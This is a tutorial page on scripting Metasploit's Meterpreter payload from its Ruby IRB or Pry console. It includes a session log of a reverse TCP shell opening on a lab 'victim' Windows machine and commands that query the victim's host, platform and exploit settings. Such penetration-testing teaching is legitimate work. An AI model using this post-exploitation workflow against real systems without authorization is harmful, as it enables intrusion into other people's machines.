Meterpreter

From the official wiki, The Meterpreter is an advanced payload that has been part of Metasploit since 2004. Originally written by Matt "skape" Miller, dozens of contributors have provided additional code, and the payload continues to be frequently updated as part of Metasploit development.

Meterpreter is a payload framework that provides APIs to interact with by writing scripts and plugins that increase its capabilities. You can find Meterpreter scripts in metasploit-framework/scripts/meterpreter those scripts that you use in post exploitation using run (e.g. getuid, getsystem, migrate, scraper, etc). Meterpreter source code is located in metasploit-framework/lib/rex/post/meterpreter.

Actually, you can't imagine the power of Meterpreter until you read its wishlist and features not just use it.

To get started, let's to get a Meterpreter shell on a victim machine to start practicing it inline then we can write some scripts

Once you get the Meterpreter shell type irb to be dropped into ruby's IRB. Most of required modules will be loaded already. Then type require 'irb/completion' to support auto-completion for the IRB console, just like the follows

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.18:4444
[*] Starting the payload handler...
[*] Sending stage (957486 bytes) to 192.168.0.18
[*] Meterpreter session 1 opened (192.168.0.18:4444 -> 192.168.0.18:33603) at 2015-11-22 06:33:00 +0300
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the Meterpreter client
>> require 'irb/completion'
=> true

If you would like to use Pry instead of irb then type pry and make the console more readable. Personally, I'd prefer pry

meterpreter > pry
_pry_.prompt = proc { "-> " }

As you can see, you've been dropped to the IRB console with an instance variable called client of the running Meterpreter.

Try this as a start

print_good("Rubyfu!")
  • To list all associated methods with client instance

This will return an array.

puts client.methods.sort

Let's to check some of the interesting methods there.

  • Victim's IP address and port

client.session_host
client.session_port
  • Victim's computer information and plat form

client.info
client.platform

Returns

=> "win7-64-victim\\Workshop @ WIN7-64-VICTIM"
=> "x86/win32"
  • Get the current exploit datastore

client.exploit_datastore
# Or
client.exploit.datastore

Returns a hash contains all the exploit information that result to this Meterpreter session

{"VERBOSE"=>false, "WfsDelay"=>0, "EnableContextEncoding"=>false, "DisablePayloadHandler"=>false, "ExitOnSession"=>true, "ListenerTimeout"=>0, "payload"=>"windows/meterpreter/reverse_tcp", "LPORT"=>4444, "ReverseConnectRetries"=>5, "ReverseAllowProxy"=>false, "ReverseListenerThreaded"=>false, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "EXITFUNC"=>"process", "AutoLoadStdapi"=>true, "AutoVerifySession"=>true, "AutoVerifySessionTimeout"=>30, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "lhost"=>"192.168.0.18", "ReverseListenerBindPort"=>0, "TARGET"=>0}

[3]: https://dev.metasploit.com/documents/meterpreter.pdf